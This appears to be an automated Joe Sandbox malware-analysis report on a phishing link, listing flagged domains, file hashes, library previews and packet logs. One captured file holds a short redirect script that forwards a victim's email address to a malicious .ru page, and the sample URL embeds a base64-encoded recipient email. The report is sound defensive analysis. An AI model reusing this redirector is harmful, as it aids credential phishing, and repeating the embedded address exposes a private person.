                            https://technucleuswe.ru/#classic-carschromecache_58.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://technucleuswe.ru/#electric-vehicleschromecache_58.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://technucleuswe.ru/#faqchromecache_58.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://technucleuswe.ru/#chromecache_58.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://technucleuswe.ru/#aboutchromecache_58.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://technucleuswe.ru/#learn-morechromecache_58.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://technucleuswe.ru/#termschromecache_58.2.drfalse
                            • Avira URL Cloud: safe
                            unknown
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            162.241.87.113
                            summitadvisor.coUnited States
                            46606UNIFIEDLAYER-AS-1USfalse
                            104.17.24.14
                            unknownUnited States
                            13335CLOUDFLARENETUSfalse
                            104.18.94.41
                            unknownUnited States
                            13335CLOUDFLARENETUSfalse
                            142.250.185.132
                            www.google.comUnited States
                            15169GOOGLEUSfalse
                            104.18.95.41
                            challenges.cloudflare.comUnited States
                            13335CLOUDFLARENETUSfalse
                            104.18.21.223
                            clicks.aweber.comUnited States
                            13335CLOUDFLARENETUSfalse
                            104.21.81.207
                            bytebloomoe.ruUnited States
                            13335CLOUDFLARENETUStrue
                            151.101.2.137
                            code.jquery.comUnited States
                            54113FASTLYUSfalse
                            239.255.255.250
                            unknownReserved
                            unknownunknownfalse
                            188.114.96.3
                            technucleuswe.ruEuropean Union
                            13335CLOUDFLARENETUStrue
                            35.190.80.1
                            a.nel.cloudflare.comUnited States
                            15169GOOGLEUSfalse
                            104.17.25.14
                            cdnjs.cloudflare.comUnited States
                            13335CLOUDFLARENETUSfalse
                            IP
                            192.168.2.7
                            192.168.2.6
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1492471
                            Start date and time:2024-08-13 21:56:34 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 3m 32s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:browseurl.jbs
                            Sample URL:https://clicks.aweber.com/y/ct/?l=1Lr_k&m=h9RNUFV_ixtHDTP&b=0la683CmRD4xZfKbroa5Lg#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:8
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal76.phis.win@20/22@28/14
                            • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 142.250.186.131, 142.250.186.174, 173.194.76.84, 34.104.35.123, 20.114.59.183, 192.229.221.95, 20.3.187.198, 93.184.221.240, 13.85.23.206, 20.242.39.171, 131.107.255.255, 142.250.184.195
                            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, clientservices.googleapis.com, wu.azureedge.net, dns.msftncsi.com, clients2.google.com, ocsp.digicert.com, ocsp.edge.digicert.com, glb.cws.prod.dcat.dsp.trafficmanager.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, update.googleapis.com, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net, client.wns.windows.com, fs.microsoft.com, accounts.google.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, edgedl.me.gvt1.com, clients.l.google.com
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size getting too big, too many NtSetInformationFile calls found.
                            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                            • VT rate limit hit for: https://clicks.aweber.com/y/ct/?l=1Lr_k&m=h9RNUFV_ixtHDTP&b=0la683CmRD4xZfKbroa5Lg#McGF0dGkucGFzc21vcmVAZmlyc3RvbnRhcmlvLmNvbQ==
                            No simulations
                            No context
                            No context
                            No context
                            No context
                            No context
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:PNG image data, 43 x 78, 8-bit/color RGB, non-interlaced
                            Category:downloaded
                            Size (bytes):61
                            Entropy (8bit):4.022997040570905
                            Encrypted:false
                            SSDEEP:3:yionv//thPl+xtnlHZ/1xl/k4E08up:6v/lhPm57Tp
                            MD5:2ED5370F734F4E35484B3993D36DC34D
                            SHA1:6C91F399643719AED6CB082B71DFBBB87F6C4766
                            SHA-256:B22750B51B8915184843B69B031AE35A49BE5249238C0770755550DAE726F013
                            SHA-512:279B5D71AB5EFBC41DDDA96A7227227B2CCC61CC7DEEBC749F7FA26BCD99AECAF21E884C4150BAA3892E46BC35565E8DBD3A96184B78B3B7A4D749B0AC9662C5
                            Malicious:false
                            Reputation:low
                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/i/8b2b466a48c34405/1723579057997/X0zYzRAJGWXc7Vm
                            Preview:.PNG........IHDR...+...N.....6.x~....IDAT.....$.....IEND.B`.
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text, with CRLF, LF line terminators
                            Category:downloaded
                            Size (bytes):1249
                            Entropy (8bit):5.242453121762845
                            Encrypted:false
                            SSDEEP:24:hYYIzD6yJRA3ZsjNQCRtgoLY95Mu56+eDHHLFCOXAkRcfRrzd0Ll72rKQk:rq6Kj2CZLY5Mc6NDLYzkYKLlOM
                            MD5:F58515DFE987F7E027C8A71BBC884621
                            SHA1:BEC6AEBF5940EA88FBBFF5748D539453D49FA284
                            SHA-256:679E7E62B81267C93D0778083AE0FD0EFE24172FF0AC581835B54165B3D9ED43
                            SHA-512:F085346A38318F7935D76909DB0367862924CC9B0D96256F7FF4E8999C041E610BBCDE8CA56C92673BDE0991C85E9C9D9B6726ABD91D0C3177462C80D4A99140
                            Malicious:false
                            Reputation:low
                            URL:https://bytebloomoe.ru/favicon.ico
                            Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.<title> 404 Not Found..</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>.<h2 style="margin-top:20px;font-size: 30px;">Not Found..</h2>.<p>The resource requested could not be found on this server!</p>.</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65447)
                            Category:dropped
                            Size (bytes):89501
                            Entropy (8bit):5.289893677458563
                            Encrypted:false
                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                            Malicious:false
                            Reputation:low
                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:PNG image data, 43 x 78, 8-bit/color RGB, non-interlaced
                            Category:dropped
                            Size (bytes):61
                            Entropy (8bit):4.022997040570905
                            Encrypted:false
                            SSDEEP:3:yionv//thPl+xtnlHZ/1xl/k4E08up:6v/lhPm57Tp
                            MD5:2ED5370F734F4E35484B3993D36DC34D
                            SHA1:6C91F399643719AED6CB082B71DFBBB87F6C4766
                            SHA-256:B22750B51B8915184843B69B031AE35A49BE5249238C0770755550DAE726F013
                            SHA-512:279B5D71AB5EFBC41DDDA96A7227227B2CCC61CC7DEEBC749F7FA26BCD99AECAF21E884C4150BAA3892E46BC35565E8DBD3A96184B78B3B7A4D749B0AC9662C5
                            Malicious:false
                            Reputation:low
                            Preview:.PNG........IHDR...+...N.....6.x~....IDAT.....$.....IEND.B`.
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (65447)
                            Category:downloaded
                            Size (bytes):89501
                            Entropy (8bit):5.289893677458563
                            Encrypted:false
                            SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                            MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                            SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                            SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                            SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                            Malicious:false
                            Reputation:low
                            URL:https://code.jquery.com/jquery-3.6.0.min.js
                            Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text, with CRLF, LF line terminators
                            Category:downloaded
                            Size (bytes):1249
                            Entropy (8bit):5.242453121762845
                            Encrypted:false
                            SSDEEP:24:hYYIzD6yJRA3ZsjNQCRtgoLY95Mu56+eDHHLFCOXAkRcfRrzd0Ll72rKQk:rq6Kj2CZLY5Mc6NDLYzkYKLlOM
                            MD5:F58515DFE987F7E027C8A71BBC884621
                            SHA1:BEC6AEBF5940EA88FBBFF5748D539453D49FA284
                            SHA-256:679E7E62B81267C93D0778083AE0FD0EFE24172FF0AC581835B54165B3D9ED43
                            SHA-512:F085346A38318F7935D76909DB0367862924CC9B0D96256F7FF4E8999C041E610BBCDE8CA56C92673BDE0991C85E9C9D9B6726ABD91D0C3177462C80D4A99140
                            Malicious:false
                            Reputation:low
                            URL:"https://bytebloomoe.ru/8QnWX/,"
                            Preview:<!DOCTYPE html>.<html style="height:100%">.<head>.<meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.<title> 404 Not Found..</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head>.<body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;">.<div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;">. <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1>.<h2 style="margin-top:20px;font-size: 30px;">Not Found..</h2>.<p>The resource requested could not be found on this server!</p>.</div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text, with CRLF line terminators
                            Category:downloaded
                            Size (bytes):413
                            Entropy (8bit):5.284190312402625
                            Encrypted:false
                            SSDEEP:12:hnMEwuiuX4w4vy4Wh3uydMoyAaexH0QYMbb:hMNmMvy4Wp7dyAarQYM/
                            MD5:5B20E87CB64CE63AA273E21EBF3103B9
                            SHA1:E0AFC764CB15B8BAEDFD0E302BF0DBDC257FB203
                            SHA-256:07BBE501F50756DE34306A037BBB10521D7D5EE00476686D1E898CF8BD9A5A23
                            SHA-512:8072D8BF5950E22F3DBC2527DD10D67745617436BF2892771358BE4C7309BC7184C7E6266A1751E981FE8926687B81D6DDF4951B2A6EE34BE9C8A8EA6026EB77
                            Malicious:false
                            Reputation:low
                            URL:https://summitadvisor.co/voipmessageauth/
                            Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">..<html xmlns="http://www.w3.org/1999/xhtml">..<head></head>..</body>..<script>.. var hash = window.location.hash;.. if(hash !== "") {.. hash = hash.split('#');.. const email = hash[1];.... window.location.href = "https://bytebloomoe.ru/8QnWX/#" + email;.. }..</script>..</html>
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (47992), with no line terminators
                            Category:dropped
                            Size (bytes):47992
                            Entropy (8bit):5.605846858683577
                            Encrypted:false
                            SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                            MD5:CF3402D7483B127DED4069D651EA4A22
                            SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                            SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                            SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                            Malicious:false
                            Reputation:low
                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (45034)
                            Category:downloaded
                            Size (bytes):45035
                            Entropy (8bit):5.4004525796866005
                            Encrypted:false
                            SSDEEP:768:oCD98WxH5PbdrKAY+2HtedqdRQgFiIonqIjaEzY+iBggYydRm1TPjXk/bYjf+cd6:/xH5PbdrZkygk7qIjDgYjJY
                            MD5:66A1BBAC0359F62478F143AE477E7059
                            SHA1:26401679C93C9EB8B7A9D159A81E9CD0FF349B93
                            SHA-256:09969FF98103700563D510B68EB73E8FC668F2D4005B58CD5F06DCB21817E140
                            SHA-512:4F90A96F7BE9699C854403E9409854ACC3639F94EC0594C41BDEF74BC9F25C6C28F0F4541391CE956BB50F645AFB126DFFC6210F7C48F31198AA88264C8A05C6
                            Malicious:false
                            Reputation:low
                            URL:https://challenges.cloudflare.com/turnstile/v0/b/cc21665cd7b9/api.js
                            Preview:"use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(p){St(u,o,c,g,_,"next",p)}function _(p){St(u,o,c,g,_,"throw",p)}g(void 0)})}}function P(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):P(e,r)}function Oe(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Ce(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Oe(e,c,a[c])})}return e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                            Category:dropped
                            Size (bytes):61
                            Entropy (8bit):3.990210155325004
                            Encrypted:false
                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                            Malicious:false
                            Reputation:low
                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (45034)
                            Category:dropped
                            Size (bytes):45035
                            Entropy (8bit):5.4004525796866005
                            Encrypted:false
                            SSDEEP:768:oCD98WxH5PbdrKAY+2HtedqdRQgFiIonqIjaEzY+iBggYydRm1TPjXk/bYjf+cd6:/xH5PbdrZkygk7qIjDgYjJY
                            MD5:66A1BBAC0359F62478F143AE477E7059
                            SHA1:26401679C93C9EB8B7A9D159A81E9CD0FF349B93
                            SHA-256:09969FF98103700563D510B68EB73E8FC668F2D4005B58CD5F06DCB21817E140
                            SHA-512:4F90A96F7BE9699C854403E9409854ACC3639F94EC0594C41BDEF74BC9F25C6C28F0F4541391CE956BB50F645AFB126DFFC6210F7C48F31198AA88264C8A05C6
                            Malicious:false
                            Reputation:low
                            Preview:"use strict";(function(){function St(e,r,a,o,c,u,g){try{var _=e[u](g),p=_.value}catch(f){a(f);return}_.done?r(p):Promise.resolve(p).then(o,c)}function Ot(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var u=e.apply(r,a);function g(p){St(u,o,c,g,_,"next",p)}function _(p){St(u,o,c,g,_,"throw",p)}g(void 0)})}}function P(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):P(e,r)}function Oe(e,r,a){return r in e?Object.defineProperty(e,r,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[r]=a,e}function Ce(e){for(var r=1;r<arguments.length;r++){var a=arguments[r]!=null?arguments[r]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){Oe(e,c,a[c])})}return e}function _r(e,r){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:HTML document, ASCII text, with very long lines (441), with CRLF line terminators
                            Category:dropped
                            Size (bytes):6874
                            Entropy (8bit):4.6752164687773226
                            Encrypted:false
                            SSDEEP:96:bS2kPUNnlFVDTWJO8azHFECdvIkOP3jX9aFTGD7XwQG6ajLb:bS9OvjzHfgUGvajLb
                            MD5:3FE39059818196D7A589B142D7CA98C6
                            SHA1:8985921BFAACBE69EC85A444F4062B0EEDAB3578
                            SHA-256:64C301E3702512AD0D1CE677CEC9BE8FB8E5A32E77E2763FAB776C422E5C7EF6
                            SHA-512:A86B764891735EED6B66D45FF769DCFDF98D6AB54F341A554B8995D4A7BF81C492679A814F61A01F3664FBDC3BDD63E4B526CE38F8050C778A3ECE4E840D810E
                            Malicious:false
                            Reputation:low
                            Preview:<!DOCTYPE html>..<html lang="en">..<head>.. <meta charset="UTF-8">.. <meta name="viewport" content="width=device-width, initial-scale=1.0">.. <title>Classic Car Admirers - technucleuswe.ru</title>.. <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">.. <style>.. body {.. padding-top: 56px;.. background-color: #f8f9fa;.. }.. .hero {.. background: url('https://th.bing.com/th/id/OIP.RH6rlJvZy8owZq3ZUZyjtgHaDs') no-repeat center center;.. background-size: cover;.. color: white;.. padding: 150px 0;.. text-align: center;.. }.. .content-section {.. padding: 60px 0;.. }.. .footer {.. background: #343a40;.. color: white;.. padding: 20px 0;.. text
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:ASCII text, with very long lines (47992), with no line terminators
                            Category:downloaded
                            Size (bytes):47992
                            Entropy (8bit):5.605846858683577
                            Encrypted:false
                            SSDEEP:768:LuxoaUN4+OIhwP53+e0QfA31jQM9OT81NHv4rnwfe:LuxoaU2+LwB2+G1ZdvCwfe
                            MD5:CF3402D7483B127DED4069D651EA4A22
                            SHA1:BDE186152457CACF9C35477B5BDDA5BCB56B1F45
                            SHA-256:EAB5D90A71736F267AF39FDF32CAA8C71673FD06703279B01E0F92B0D7BE0BFC
                            SHA-512:9CE42EBC3F672A2AEFC4376F43D38CA9ED9D81AA5B3C1EEF60032BCC98A1C399BE68D71FD1D5F9DE6E98C4CE0B800F6EF1EF5E83D417FBFFA63EEF2408DA55D8
                            Malicious:false
                            Reputation:low
                            URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
                            Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var h,t,e,r,i,n,f,o,s,c,a,l,d,m,x,b,H,z,A,u,p,_,v,y,g,B,w,k,S,C,D,E,R,M,F,P,W,O,I,U,K,X,L,j,N,T,q,Z,V,G,J,$,Q,Y,tt,et,rt,it,nt,ot,st,ct,at,ht,lt,ft,dt,ut,pt,_t,vt,yt,gt,Bt,wt,kt,St,bt=bt||function(l){var t;if("undefined"!=typeof window&&window.crypto&&(t=window.crypto),!t&&"undefined"!=typeof window&&window.msCrypto&&(t=window.msCrypto),!t&&"undefined"!=typeof global&&global.crypto&&(t=global.crypto),!t&&"function"==typeof require)try{t=require("crypto")}catch(t){}function i(){if(t){if("function"==typeof t.getRandomValues)try{return t.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof t.randomBytes)try{return t.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}var r=Object.create||function(t){var e;return n.prototype=t,e=new n,n.prototype=null
                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                            File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                            Category:downloaded
                            Size (bytes):61
                            Entropy (8bit):3.990210155325004
                            Encrypted:false
                            SSDEEP:3:yionv//thPltV/CI7syxl/k4E08up:6v/lhPgI17Tp
                            MD5:9246CCA8FC3C00F50035F28E9F6B7F7D
                            SHA1:3AA538440F70873B574F40CD793060F53EC17A5D
                            SHA-256:C07D7D29E3C20FA6CA4C5D20663688D52BAD13E129AD82CE06B80EB187D9DC84
                            SHA-512:A2098304D541DF4C71CDE98E4C4A8FB1746D7EB9677CEBA4B19FF522EFDD981E484224479FD882809196B854DBC5B129962DBA76198D34AAECF7318BD3736C6B
                            Malicious:false
                            Reputation:low
                            URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D
                            Preview:.PNG........IHDR...............s....IDAT.....$.....IEND.B`.
                            No static file info
                            TimestampSource PortDest PortSource IPDest IP
                            Aug 13, 2024 21:57:20.460392952 CEST49673443192.168.2.6173.222.162.64
                            Aug 13, 2024 21:57:20.476044893 CEST49674443192.168.2.6173.222.162.64
                            Aug 13, 2024 21:57:20.788542032 CEST49672443192.168.2.6173.222.162.64
                            Aug 13, 2024 21:57:29.054444075 CEST49715443192.168.2.640.115.3.253
                            Aug 13, 2024 21:57:29.054476976 CEST4434971540.115.3.253192.168.2.6
                            Aug 13, 2024 21:57:29.054594994 CEST49715443192.168.2.640.115.3.253
                            Aug 13, 2024 21:57:29.055150986 CEST49715443192.168.2.640.115.3.253
                            Aug 13, 2024 21:57:29.055169106 CEST4434971540.115.3.253192.168.2.6
                            Aug 13, 2024 21:57:29.522962093 CEST49716443192.168.2.6104.18.21.223
                            Aug 13, 2024 21:57:29.523009062 CEST44349716104.18.21.223192.168.2.6
                            Aug 13, 2024 21:57:29.523093939 CEST49716443192.168.2.6104.18.21.223
                            Aug 13, 2024 21:57:29.523350000 CEST49717443192.168.2.6104.18.21.223
                            Aug 13, 2024 21:57:29.523372889 CEST44349717104.18.21.223192.168.2.6
                            Aug 13, 2024 21:57:29.523459911 CEST49717443192.168.2.6104.18.21.223
                            Aug 13, 2024 21:57:29.524192095 CEST49717443192.168.2.6104.18.21.223
                            Aug 13, 2024 21:57:29.524205923 CEST44349717104.18.21.223192.168.2.6
                            Aug 13, 2024 21:57:29.524427891 CEST49716443192.168.2.6104.18.21.223
                            Aug 13, 2024 21:57:29.524458885 CEST44349716104.18.21.223192.168.2.6
                            Aug 13, 2024 21:57:30.013061047 CEST44349717104.18.21.223192.168.2.6
                            Aug 13, 2024 21:57:30.013386965 CEST49717443192.168.2.6104.18.21.223
                            Aug 13, 2024 21:57:30.013401985 CEST44349717104.18.21.223192.168.2.6
                            Aug 13, 2024 21:57:30.015130997 CEST44349717104.18.21.223192.168.2.6
                            Aug 13, 2024 21:57:30.015204906 CEST49717443192.168.2.6104.18.21.223
                            Aug 13, 2024 21:57:30.016433954 CEST49717443192.168.2.6104.18.21.223
                            Aug 13, 2024 21:57:30.016546965 CEST44349717104.18.21.223192.168.2.6
                            Aug 13, 2024 21:57:30.016614914 CEST49717443192.168.2.6104.18.21.223
                            Aug 13, 2024 21:57:30.016621113 CEST44349717104.18.21.223192.168.2.6
                            Aug 13, 2024 21:57:30.020010948 CEST44349716104.18.21.223192.168.2.6
                            Aug 13, 2024 21:57:30.020204067 CEST49716443192.168.2.6104.18.21.223
                            Aug 13, 2024 21:57:30.020230055 CEST44349716104.18.21.223192.168.2.6
                            Aug 13, 2024 21:57:30.021773100 CEST44349716104.18.21.223192.168.2.6
                            Aug 13, 2024 21:57:30.021836996 CEST49716443192.168.2.6104.18.21.223
                            Aug 13, 2024 21:57:30.023049116 CEST49716443192.168.2.6104.18.21.223
                            Aug 13, 2024 21:57:30.023150921 CEST44349716104.18.21.223192.168.2.6
                            Aug 13, 2024 21:57:30.038261890 CEST4434971540.115.3.253192.168.2.6
